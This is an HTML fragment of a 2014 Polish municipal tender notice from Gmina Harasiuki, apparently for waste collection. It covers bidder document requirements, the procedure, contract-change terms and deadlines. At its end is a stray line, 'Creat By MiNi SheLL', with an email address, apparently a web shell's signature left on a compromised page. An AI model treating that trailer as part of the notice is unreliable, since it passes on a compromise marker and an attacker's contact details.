<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmiany postanowień zawartej umowy w stosunku do treści oferty dotyczącej wynagrodzenia Wykonawcy: 
- nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego np. ustawy, rozporządzenia, 
- zmiana obowiązującej stawki podatku VAT ,jeśli zmiana stawki podatku VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę, 
- w przypadku wystąpienia konieczności większej częstotliwości odbioru i zagospodarowania odpadów komunalnych gromadzonych w PSZOK niż zadeklarowanych w umowie, wynagrodzenie może zostać zwiększone o rzeczywiste kosztu wywozu, liczone wg. cen jednostkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.harasiuki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Harasiuki, 37 - 413 Harasiuki 112A, pokój Nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 09:00, miejsce: Urząd Gminy Harasiuki 37 - 413 Harasiuki 112A, pokój nr 7 (sekretariat ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com